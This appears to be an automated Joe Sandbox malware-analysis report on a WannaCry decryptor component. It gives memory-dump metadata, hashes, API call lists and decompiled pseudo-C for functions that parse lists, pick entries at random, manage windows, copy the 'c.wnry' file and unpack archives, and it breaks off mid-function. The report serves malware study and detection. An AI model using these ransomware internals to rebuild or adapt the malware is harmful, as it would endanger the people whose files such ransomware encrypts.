Software\, xrefs: 00401C7F

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: CurrentDirectoryValue$CloseCreateQuerywcscat
String ID: Software\$WanaCrypt0r
API String ID: 3883271862-1723423467
Opcode ID: 105d7a24118395946ed673951bb32e2166cb0bb2b49e0db688a6da733a97e5a2
Instruction ID: c02b3dbe7123360802e3a7ceba079e11f57c538643229ddb10ed726050e42e59
Opcode Fuzzy Hash: 105d7a24118395946ed673951bb32e2166cb0bb2b49e0db688a6da733a97e5a2
Instruction Fuzzy Hash: 5F31C271208341ABD320CF54DC44BEBB7A8FFC4750F404D2EF996A7290D7B4A90987A6

Uniqueness

Uniqueness Score: -1.00%

Function 0040BAF0 Relevance: 15.3, APIs: 10, Instructions: 301
stringsleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E0040BAF0() {
				signed int _t71;
				signed int _t72;
				void* _t84;
				signed int _t86;
				signed int _t91;
				signed int _t92;
				signed int _t97;
				intOrPtr _t101;
				signed int _t110;
				void* _t113;
				void* _t116;
				signed int _t126;
				char _t129;
				signed int _t131;
				unsigned int _t138;
				signed int _t139;
				char* _t144;
				signed int _t147;
				unsigned int _t152;
				signed int _t153;
				signed int _t158;
				signed int _t160;
				signed int _t161;
				signed int _t169;
				signed int _t172;
				signed int _t173;
				signed int _t181;
				signed int _t191;
				signed int _t198;
				signed int _t199;
				signed int _t200;
				void* _t237;
				char* _t238;
				void* _t240;
				void* _t241;
				intOrPtr* _t242;
				void* _t245;
				intOrPtr* _t246;
				signed int _t249;
				intOrPtr* _t250;
				intOrPtr _t251;
				void* _t252;
				void* _t255;
				void* _t256;
				void* _t257;
				void* _t259;
				void* _t260;
				void* _t262;
				void* _t263;
				void* _t264;

				_push(0xffffffff);
				_push(E00414286);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t251;
				_t252 = _t251 - 0x47c;
				_t71 = E0040BA10();
				if(_t71 != 0) {
					L31:
					_t72 = _t71 | 0xffffffff;
					__eflags = _t72;
				} else {
					_t131 =  *0x422210; // 0xa94228
					 *((intOrPtr*)( *_t131 + 0xc))();
					asm("repne scasb");
					_t266 =  !(_t131 | 0xffffffff) == 1;
					if( !(_t131 | 0xffffffff) == 1) {
						L3:
						_t249 = 0;
						 *((char*)(_t252 + 0x14)) =  *((intOrPtr*)(_t252 + 0x13));
						 *((intOrPtr*)(_t252 + 0x18)) = E0040C8F0(0, 0, 0);
						 *(_t252 + 0x1c) = 0;
						asm("repne scasb");
						_t138 =  !(_t252 + 0x0000001c | 0xffffffff);
						_t237 =  *((intOrPtr*)(_t252 + 0x49c)) - _t138;
						 *((intOrPtr*)(_t252 + 0x498)) = 0;
						_t139 = _t138 >> 2;
						memcpy(_t237 + _t139 + _t139, _t237, memcpy(_t252 + 0xa4, _t237, _t139 << 2) & 0x00000003);
						_t255 = _t252 + 0x18;
						_t144 = _t255 + 0xa8;
						_t238 = strtok(_t144, ",;");
						_t256 = _t255 + 8;
						if(_t238 != 0) {
							_t129 =  *((intOrPtr*)(_t256 + 0x13));
							do {
								_t200 = _t249;
								_t249 = _t249 + 1;
								if(_t200 > 0) {
									_t181 = _t256 + 0x28;
									 *(_t256 + 0x28) = _t129;
									E0040C7B0(_t181, 0);
									asm("repne scasb");
									_push( !(_t181 | 0xffffffff) - 1);
									_push(_t238);
									E0040C920(_t256 + 0x2c);
									 *((char*)(_t256 + 0x4a0)) = 1;
									E0040C800(_t256 + 0x24, _t256 + 0x20, _t256 + 0x24,  *((intOrPtr*)(_t256 + 0x18)), _t256 + 0x24);
									_t144 = _t256 + 0x28;
									 *((char*)(_t256 + 0x498)) = 0;
									E0040C7B0(_t144, 1);
								}
								_t238 = strtok(0, ",;");
								_t256 = _t256 + 8;
							} while (_t238 != 0);
						}
						asm("repne scasb");
						_t147 =  !(_t144 | 0xffffffff) - 1;
						if(_t147 == 0) {
							L17:
							_push(_t256 + 0xa4);
							_t84 = E0040BA60(_t277);
							_t256 = _t256 + 4;
							if(_t84 != 0) {
								goto L19;
							} else {
								asm("repne scasb");
								_t172 =  !(_t147 | 0xffffffff);
								_t245 = _t256 + 0xa4 - _t172;
								_t173 = _t172 >> 2;
								memcpy(0x422214, _t245, _t173 << 2);
								_t263 = _t256 + 0xc;
								 *((intOrPtr*)(_t263 + 0x498)) = 0xffffffff;
								_t113 = memcpy(_t245 + _t173 + _t173, _t245, _t172 & 0x00000003);
								_t264 = _t263 + 0xc;
								E0040C860(_t264 + 0x20, _t264 + 0x24,  *_t113,  *((intOrPtr*)(_t256 + 0x18)));
								_push( *((intOrPtr*)(_t264 + 0x18)));
								L00412C98();
								_t252 = _t264 + 4;
								_t72 = 0;
							}
						} else {
							_t246 = _t256 + 0xa4;
							_t116 = 0x422214;
							while(1) {
								_t198 =  *_t116;
								_t147 = _t198;
								if(_t198 !=  *_t246) {
									break;
								}
								if(_t147 == 0) {
									L14:
									_t116 = 0;
								} else {
									_t24 = _t116 + 1; // 0x0
									_t199 =  *_t24;
									_t147 = _t199;
									if(_t199 !=  *((intOrPtr*)(_t246 + 1))) {
										break;
									} else {
										_t116 = _t116 + 2;
										_t246 = _t246 + 2;
										if(_t147 != 0) {
											continue;
										} else {
											goto L14;
										}
									}
								}
								L16:
								_t277 = _t116;
								if(_t116 == 0) {
									L19:
									srand(GetTickCount());
									_t86 =  *(_t256 + 0x20);
									_t257 = _t256 + 4;
									__eflags = _t86;
									if(_t86 <= 0) {
										L30:
										 *((intOrPtr*)(_t257 + 0x494)) = 0xffffffff;
										_t71 = E0040C860(_t257 + 0x20, _t257 + 0x3c,  *((intOrPtr*)( *((intOrPtr*)(_t257 + 0x18)))),  *((intOrPtr*)(_t257 + 0x18)));
										_push( *((intOrPtr*)(_t257 + 0x18)));
										L00412C98();
										_t252 = _t257 + 4;
										goto L31;
									} else {
										do {
											_t191 = rand() % _t86;
											_t250 =  *((intOrPtr*)( *((intOrPtr*)(_t257 + 0x18))));
											__eflags = _t191;
											_t91 = _t191;
											if(_t191 > 0) {
												_t91 = 0;
												__eflags = 0;
												do {
													_t250 =  *_t250;
													_t191 = _t191 - 1;
													__eflags = _t191;
												} while (_t191 != 0);
											}
											__eflags = _t91;
											if(_t91 < 0) {
												_t110 =  ~_t91;
												do {
													_t250 =  *((intOrPtr*)(_t250 + 4));
													_t110 = _t110 - 1;
													__eflags = _t110;
												} while (_t110 != 0);
											}
											_t92 =  *(_t250 + 0xc);
											_t42 = _t250 + 8; // 0x8
											_t126 = _t42;
											__eflags = _t92;
											if(__eflags == 0) {
												_t92 = 0x41ba38;
											}
											asm("repne scasb");
											_t152 =  !(_t147 | 0xffffffff);
											_t240 = _t92 - _t152;
											_t153 = _t152 >> 2;
											memcpy(_t240 + _t153 + _t153, _t240, memcpy(_t257 + 0x40, _t240, _t153 << 2) & 0x00000003);
											_t259 = _t257 + 0x18;
											_t158 = _t259 + 0x40;
											_push(_t158);
											_t97 = E0040BA60(__eflags);
											_t260 = _t259 + 4;
											__eflags = _t97;
											if(_t97 == 0) {
												 *((intOrPtr*)(_t260 + 0x494)) = 0xffffffff;
												asm("repne scasb");
												_t160 =  !(_t158 | 0xffffffff);
												_t241 = _t260 + 0x40 - _t160;
												_t161 = _t160 >> 2;
												memcpy(0x422214, _t241, _t161 << 2);
												memcpy(_t241 + _t161 + _t161, _t241, _t160 & 0x00000003);
												_t262 = _t260 + 0x18;
												_t242 =  *((intOrPtr*)(_t262 + 0x18));
												_t101 =  *_t242;
												__eflags = _t101 - _t242;
												 *((intOrPtr*)(_t262 + 0x20)) = _t101;
												if(_t101 != _t242) {
													do {
														_push(0);
														E0040C740(_t262 + 0x1c, _t262 + 0x3c,  *((intOrPtr*)(E00402D90(_t262 + 0x28, _t262 + 0x38))));
														__eflags =  *((intOrPtr*)(_t262 + 0x20)) - _t242;
													} while ( *((intOrPtr*)(_t262 + 0x20)) != _t242);
												}
												_push( *((intOrPtr*)(_t262 + 0x18)));
												L00412C98();
												_t252 = _t262 + 4;
												_t72 = 0;
											} else {
												goto L29;
											}
											goto L32;
											L29:
											_t169 =  *0x422210; // 0xa94228
											 *((intOrPtr*)( *_t169 + 0xc))();
											 *((intOrPtr*)( *((intOrPtr*)(_t250 + 4)))) =  *_t250;
											_t147 = _t126;
											 *((intOrPtr*)( *_t250 + 4)) =  *((intOrPtr*)(_t250 + 4));
											E0040CE50(_t147, 0);
											_push(_t250);
											L00412C98();
											_t257 = _t260 + 4;
											 *((intOrPtr*)(_t257 + 0x20)) =  *((intOrPtr*)(_t260 + 0x20)) - 1;
											Sleep(0xbb8); // executed
											_t86 =  *(_t257 + 0x1c);
											__eflags = _t86;
										} while (_t86 > 0);
										goto L30;
									}
								} else {
									goto L17;
								}
								goto L32;
							}
							asm("sbb eax, eax");
							asm("sbb eax, 0xffffffff");
							goto L16;
						}
					} else {
						_push(0x422214);
						_t72 = E0040BA60(_t266);
						_t252 = _t252 + 4;
						if(_t72 != 0) {
							goto L3;
						}
					}
				}
				L32:
				 *[fs:0x0] =  *((intOrPtr*)(_t252 + 0x48c));
				return _t72;
			}

0x0040baf6
0x0040baf8
0x0040bafd
0x0040bafe
0x0040bb05
0x0040bb0f
0x0040bb16
0x0040bdf5
0x0040bdf5
0x0040bdf5
0x0040bb1c
0x0040bb1c
0x0040bb24
0x0040bb31
0x0040bb35
0x0040bb36
0x0040bb4d
0x0040bb51
0x0040bb53
0x0040bb62
0x0040bb66
0x0040bb7d
0x0040bb7f
0x0040bb8a
0x0040bb8e
0x0040bb95
0x0040bb9f
0x0040bb9f
0x0040bba1
0x0040bbae
0x0040bbb0
0x0040bbb5
0x0040bbb7
0x0040bbbb
0x0040bbbb
0x0040bbbd
0x0040bbc0
0x0040bbc4
0x0040bbc8
0x0040bbcc
0x0040bbd8
0x0040bbdd
0x0040bbde
0x0040bbe3
0x0040bbfb
0x0040bc03
0x0040bc0a
0x0040bc0e
0x0040bc16
0x0040bc16
0x0040bc27
0x0040bc29
0x0040bc2c
0x0040bbbb
0x0040bc3a
0x0040bc3e
0x0040bc3f
0x0040bc7e
0x0040bc85
0x0040bc86
0x0040bc8b
0x0040bc90
0x00000000
0x0040bc92
0x0040bc9c
0x0040bc9e
0x0040bca8
0x0040bcb0
0x0040bcb3
0x0040bcb3
0x0040bcb7
0x0040bcc5
0x0040bcc5
0x0040bcd3
0x0040bcdc
0x0040bcdd
0x0040bce2
0x0040bce5
0x0040bce5
0x0040bc41
0x0040bc41
0x0040bc48
0x0040bc4d
0x0040bc4d
0x0040bc51
0x0040bc55
0x00000000
0x00000000
0x0040bc59
0x0040bc71
0x0040bc71
0x0040bc5b
0x0040bc5b
0x0040bc5b
0x0040bc61
0x0040bc65
0x00000000
0x0040bc67
0x0040bc67
0x0040bc6a
0x0040bc6f
0x00000000
0x00000000
0x00000000
0x00000000
0x0040bc6f
0x0040bc65
0x0040bc7a
0x0040bc7a
0x0040bc7c
0x0040bcec
0x0040bcf3
0x0040bcf8
0x0040bcfc
0x0040bcff
0x0040bd01
0x0040bdc7
0x0040bdcb
0x0040bde3
0x0040bdec
0x0040bded
0x0040bdf2
0x00000000
0x0040bd07
0x0040bd07
0x0040bd10
0x0040bd16
0x0040bd18
0x0040bd1a
0x0040bd1c
0x0040bd1e
0x0040bd1e
0x0040bd20
0x0040bd20
0x0040bd23
0x0040bd23
0x0040bd23
0x0040bd20
0x0040bd26
0x0040bd28
0x0040bd2a
0x0040bd2c
0x0040bd2c
0x0040bd2f
0x0040bd2f
0x0040bd2f
0x0040bd2c
0x0040bd32
0x0040bd35
0x0040bd35
0x0040bd38
0x0040bd3a
0x0040bd3c
0x0040bd3c
0x0040bd4c
0x0040bd4e
0x0040bd54
0x0040bd58
0x0040bd62
0x0040bd62
0x0040bd64
0x0040bd68
0x0040bd69
0x0040bd6e
0x0040bd71
0x0040bd73
0x0040be1a
0x0040be25
0x0040be27
0x0040be2d
0x0040be34
0x0040be37
0x0040be3e
0x0040be3e
0x0040be40
0x0040be44
0x0040be46
0x0040be48
0x0040be4c
0x0040be4e
0x0040be52
0x0040be6a
0x0040be6f
0x0040be6f
0x0040be4e
0x0040be79
0x0040be7a
0x0040be7f
0x0040be82
0x00000000
0x00000000
0x00000000
0x00000000
0x0040bd79
0x0040bd79
0x0040bd81
0x0040bd8c
0x0040bd94
0x0040bd96
0x0040bd99
0x0040bd9e
0x0040bd9f
0x0040bda8
0x0040bdb1
0x0040bdb5
0x0040bdbb
0x0040bdbf
0x0040bdbf
0x00000000
0x0040bd07
0x00000000
0x00000000
0x00000000
0x00000000
0x0040bc7c
0x0040bc75
0x0040bc77
0x00000000
0x0040bc77
0x0040bb38
0x0040bb38
0x0040bb3d
0x0040bb42
0x0040bb47
0x00000000
0x00000000
0x0040bb47
0x0040bb36
0x0040bdf8
0x0040be03
0x0040be10

APIs

strtok.MSVCRT ref: 0040BBA9
strtok.MSVCRT ref: 0040BC22
#825.MFC42(?,?), ref: 0040BCDD
GetTickCount.KERNEL32 ref: 0040BCEC
srand.MSVCRT ref: 0040BCF3
rand.MSVCRT ref: 0040BD09
#825.MFC42(00000000,00000000,?,?,?,00000000,00000000), ref: 0040BD9F
Sleep.KERNELBASE(00000BB8,00000000,?,?,?,00000000,00000000), ref: 0040BDB5
#825.MFC42(?,?,?,?), ref: 0040BDED

Part of subcall function 0040C860: #825.MFC42(?,00000000,00000428,00422214,00000000,0040BDE8,?,?,?), ref: 0040C8B5

#825.MFC42(?), ref: 0040BE7A

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: #825$strtok$CountSleepTickrandsrand
String ID:
API String ID: 1749417438-0
Opcode ID: 6219d4958e8a19e0ebe0a886ed27d3e3574d5edb02869f1b1397cf79b1e415cd
Instruction ID: 15ce6157e9eadcb8372a8ba3d428bceb52ebc69e02ab62c17c692bc1e2f98a80
Opcode Fuzzy Hash: 6219d4958e8a19e0ebe0a886ed27d3e3574d5edb02869f1b1397cf79b1e415cd
Instruction Fuzzy Hash: 48A102716082059BC724DF34C841AABB7D4EF95314F044A3EF99AA73D1EB78D908C79A

Uniqueness

Uniqueness Score: -1.00%

Function 004085C0 Relevance: 13.6, APIs: 9, Instructions: 75
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E004085C0(intOrPtr __ecx) {
				char _v4;
				intOrPtr _v16;
				long _v20;
				void _v24;
				intOrPtr _v28;
				int _t33;
				intOrPtr _t50;
				long _t53;
				intOrPtr _t55;

				_push(0xffffffff);
				_push(E00413FF3);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t55;
				_t50 = __ecx;
				_v16 = __ecx;
				L00412C8C();
				 *((intOrPtr*)(__ecx)) = 0x4157f0;
				_v4 = 0;
				L00412F74();
				 *((intOrPtr*)(__ecx + 0x74)) = 0;
				 *((intOrPtr*)(__ecx + 0x78)) = 0;
				 *((intOrPtr*)(__ecx + 0x7c)) = 0;
				 *((intOrPtr*)(__ecx + 0x80)) = 0;
				_v4 = 1;
				 *((intOrPtr*)(__ecx)) = 0x4161a4;
				 *((intOrPtr*)(_t50 + 0x58)) = GetSysColor(0xf);
				 *((intOrPtr*)(_t50 + 0x60)) = GetSysColor(9);
				 *((intOrPtr*)(_t50 + 0x64)) = GetSysColor(0x12);
				_t53 = GetSysColor(2);
				_v20 = _t53;
				_v24 = 0;
				_t33 = SystemParametersInfoA(0x1008, 0,  &_v24, 0); // executed
				if(_t33 != 0 && _v24 != 0) {
					_t53 = GetSysColor(0x1b);
				}
				_push(0xffffffff);
				_push(2);
				L00412F50();
				 *((intOrPtr*)( *((intOrPtr*)(_t50 + 0x44)))) = _v28;
				 *((intOrPtr*)( *((intOrPtr*)(_t50 + 0x44)) + 4)) = _t53;
				 *((intOrPtr*)(_t50 + 0x70)) = 0xa;
				 *((intOrPtr*)(_t50 + 0x68)) = 0;
				 *((intOrPtr*)(_t50 + 0x6c)) = 0x28;
				 *((intOrPtr*)(_t50 + 0x54)) = 0;
				 *((intOrPtr*)(_t50 + 0x5c)) = 0;
				 *[fs:0x0] = _v20;
				return _t50;
			}

0x004085c0
0x004085c2
0x004085cd
0x004085ce
0x004085db
0x004085de
0x004085e2
0x004085e7
0x004085f2
0x004085f6
0x00408601
0x00408604
0x00408607
0x0040860a
0x00408612
0x00408617
0x00408621
0x00408628
0x0040862f
0x00408634
0x00408642
0x00408646
0x0040864a
0x00408652
0x0040865e
0x0040865e
0x00408660
0x00408662
0x00408667
0x00408674
0x0040867d
0x00408680
0x00408687
0x0040868a
0x00408691
0x00408694
0x0040869c
0x004086a6

APIs

#567.MFC42(00000000,?,?,?,000000FF,00405AAB,00000000), ref: 004085E2
#341.MFC42(00000000,?,?,?,000000FF,00405AAB,00000000), ref: 004085F6
GetSysColor.USER32 ref: 0040861D
GetSysColor.USER32(00000009), ref: 00408624
GetSysColor.USER32(00000012), ref: 0040862B
GetSysColor.USER32(00000002), ref: 00408632
KiUserCallbackDispatcher.NTDLL(00001008,00000000,00000000,00000000), ref: 0040864A
GetSysColor.USER32(0000001B), ref: 0040865C
#6140.MFC42(00000002,000000FF), ref: 00408667

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: Color$#341#567#6140CallbackDispatcherUser
String ID:
API String ID: 2603677082-0
Opcode ID: 51668d6117463ada0c326ac575935f99ab198cb4b06a73068adc63a74b909c1d
Instruction ID: 8505b43e8b24dba0e9a20122b4cf5018a120a2575fdff98832e5101b57525ea5
Opcode Fuzzy Hash: 51668d6117463ada0c326ac575935f99ab198cb4b06a73068adc63a74b909c1d
Instruction Fuzzy Hash: 7D2159B0900B449FD320DF2AC985B96FBE4FF84B14F504A2FE19687791D7B9A844CB85

Uniqueness

Uniqueness Score: -1.00%

Function 0040B620 Relevance: 13.5, APIs: 9, Instructions: 45
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040B620(WCHAR* _a4, struct HWND__* _a8) {
				struct HWND__* _t4;
				struct HWND__* _t15;

				_t4 = FindWindowW(0, _a4); // executed
				_t15 = _t4;
				if(_t15 != 0) {
					ShowWindow(_t15, 5);
					SetWindowPos(_t15, 0xffffffff, 0, 0, 0, 0, 0x43);
					SetWindowPos(_t15, 0xfffffffe, 0, 0, 0, 0, 0x43);
					SetForegroundWindow(_t15);
					SetFocus(_t15);
					SetActiveWindow(_t15);
					BringWindowToTop(_t15);
					_t4 = _a8;
					if(_t4 != 0) {
						ExitProcess(0);
					}
				}
				return _t4;
			}

0x0040b628
0x0040b62e
0x0040b632
0x0040b638
0x0040b651
0x0040b660
0x0040b663
0x0040b66a
0x0040b671
0x0040b678
0x0040b67e
0x0040b685
0x0040b689
0x0040b689
0x0040b685
0x0040b690

APIs

FindWindowW.USER32(00000000,00000000), ref: 0040B628
ShowWindow.USER32(00000000,00000005,00000000,?,00000000), ref: 0040B638
SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000043,?,00000000), ref: 0040B651
SetWindowPos.USER32(00000000,000000FE,00000000,00000000,00000000,00000000,00000043,?,00000000), ref: 0040B660
SetForegroundWindow.USER32(00000000), ref: 0040B663
SetFocus.USER32(00000000,?,00000000), ref: 0040B66A
SetActiveWindow.USER32(00000000,?,00000000), ref: 0040B671
BringWindowToTop.USER32(00000000), ref: 0040B678
ExitProcess.KERNEL32 ref: 0040B689

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: Window$ActiveBringExitFindFocusForegroundProcessShow
String ID:
API String ID: 962039509-0
Opcode ID: ec9fc34e90d3c79d5292e19d7f02050e94f93b43ef6df305d89d1d3c5b01f4c1
Instruction ID: 32f88169c1f0d7c0e12a36757c7a64a26434f73f58f3758d5628eaed19e7f987
Opcode Fuzzy Hash: ec9fc34e90d3c79d5292e19d7f02050e94f93b43ef6df305d89d1d3c5b01f4c1
Instruction Fuzzy Hash: 66F0F431245A21F7E2315B54AC0DFDF3655DFC5B21F214610F715791D4CB6455018AAD

Uniqueness

Uniqueness Score: -1.00%

Function 00401A10 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42fileCOMMON

Download Yara Rule

APIs

fopen.MSVCRT ref: 00401A2B
fread.MSVCRT ref: 00401A4B
fwrite.MSVCRT ref: 00401A58
fclose.MSVCRT ref: 00401A66
fclose.MSVCRT ref: 00401A74

Strings

c.wnry, xrefs: 00401A26

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: fclose$fopenfreadfwrite
String ID: c.wnry
API String ID: 2140422903-3240288721
Opcode ID: 6e9b76c3277035fe504f344658f288149f4646c70a2b683330cc54d29e3cf444
Instruction ID: f5186b7865cb40674a519f70d39de74d6a09c830656aa5640d665e45194f203f
Opcode Fuzzy Hash: 6e9b76c3277035fe504f344658f288149f4646c70a2b683330cc54d29e3cf444
Instruction Fuzzy Hash: 0DF0FC31746310EBD3209B19BD09BD77A56DFC0721F450436FC0ED63A4E2799946899E

Uniqueness

Uniqueness Score: -1.00%

Function 0040B6A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040B6A0(CHAR* _a4, CHAR* _a8, intOrPtr _a12) {
				char _v520;
				void _v816;
				struct _SECURITY_ATTRIBUTES* _v820;
				void* _t15;
				struct _SECURITY_ATTRIBUTES* _t37;
				CHAR* _t38;
				void* _t39;
				CHAR* _t40;
				struct _SECURITY_ATTRIBUTES** _t42;
				struct _SECURITY_ATTRIBUTES** _t44;

				_t40 = _a4;
				CreateDirectoryA(_t40, 0); // executed
				_t38 = _a8;
				_t15 = E00412920(_t38, _a12);
				_t28 = _t15;
				_t42 =  &(( &_v820)[2]);
				if(_t15 != 0) {
					_v820 = 0;
					memset( &_v816, 0, 0x4a << 2);
					E00412940(_t28, 0xffffffff,  &_v820);
					_t37 = _v820;
					_t44 =  &(_t42[6]);
					if(_t37 > 0) {
						_t39 = 0;
						if(_t37 > 0) {
							do {
								E00412940(_t28, _t39,  &_v820);
								sprintf( &_v520, "%s\\%s", _t40,  &_v816);
								E004129E0(_t28, _t39,  &_v520);
								_t44 =  &(_t44[0xa]);
								_t39 = _t39 + 1;
							} while (_t39 < _t37);
						}
						E00412A00(_t28);
						return 1;
					} else {
						return 0;
					}
				} else {
					DeleteFileA(_t38);
					return 0;
				}
			}

0x0040b6a8
0x0040b6b4
0x0040b6c1
0x0040b6ca
0x0040b6cf
0x0040b6d1
0x0040b6d6
0x0040b6f7
0x0040b6ff
0x0040b709
0x0040b70e
0x0040b712
0x0040b717
0x0040b726
0x0040b72a
0x0040b72c
0x0040b733
0x0040b74e
0x0040b75d
0x0040b762
0x0040b765
0x0040b766
0x0040b72c
0x0040b76b
0x0040b77f
0x0040b71c
0x0040b725
0x0040b725
0x0040b6d8
0x0040b6d9
0x0040b6eb
0x0040b6eb

APIs

CreateDirectoryA.KERNELBASE(?,00000000,?,757F3310,00000000,00000428), ref: 0040B6B4
DeleteFileA.KERNEL32(?), ref: 0040B6D9

Strings

%s\%s, xrefs: 0040B748

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: CreateDeleteDirectoryFile
String ID: %s\%s
API String ID: 3195586388-4073750446
Opcode ID: 9867dcfa113bb228f6e7ce7fcc7c959ecb5fe08f48f21d4d20f526cefea80cd3
Instruction ID: 62764616b0dad41b6f02366a4e891bd604a257d4ac44bdf0c04ae484a2ff6343
Opcode Fuzzy Hash: 9867dcfa113bb228f6e7ce7fcc7c959ecb5fe08f48f21d4d20f526cefea80cd3
Instruction Fuzzy Hash: 2F2108B620435067D620AB65EC81AEB779CEBC4324F44082EFD1892242E77D661D82FA

Uniqueness

Uniqueness Score: -1.00%

Function 004108A0 Relevance: 6.1, APIs: 4, Instructions: 107
fileCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E004108A0(CHAR* _a4, intOrPtr _a8, char _a12, long* _a16) {
				long _t28;
				long _t30;
				void* _t34;
				signed int _t38;
				void* _t44;
				long* _t45;
				long _t46;
				char _t47;

				_t47 = _a12;
				if(_t47 == 1 || _t47 == 2 || _t47 == 3) {
					_t45 = _a16;
					_t44 = 0;
					_t38 = 0;
					 *_t45 = 0;
					_a12 = 0;
					if(_t47 == 1) {
						_t44 = _a4;
						_a12 = 0;
						goto L10;
					} else {
						if(_t47 != 2) {
							L11:
							_push(0x20);
							L00412CEC();
							_t46 = _t28;
							if(_t47 == 1 || _t47 == 2) {
								 *_t46 = 1;
								 *((char*)(_t46 + 0x10)) = _a12;
								 *(_t46 + 1) = _t38;
								 *(_t46 + 4) = _t44;
								 *((char*)(_t46 + 8)) = 0;
								 *(_t46 + 0xc) = 0;
								if(_t38 != 0) {
									_t30 = SetFilePointer(_t44, 0, 0, 1); // executed
									 *(_t46 + 0xc) = _t30;
								}
								 *_a16 = 0;
								return _t46;
							} else {
								 *((intOrPtr*)(_t46 + 0x14)) = _a4;
								 *((intOrPtr*)(_t46 + 0x18)) = _a8;
								 *_t46 = 0;
								 *(_t46 + 1) = 1;
								 *((char*)(_t46 + 0x10)) = 0;
								 *((intOrPtr*)(_t46 + 0x1c)) = 0;
								 *(_t46 + 0xc) = 0;
								 *_a16 = 0;
								return _t46;
							}
						} else {
							_t34 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0x80, 0); // executed
							_t44 = _t34;
							if(_t44 != 0xffffffff) {
								_a12 = 1;
								L10:
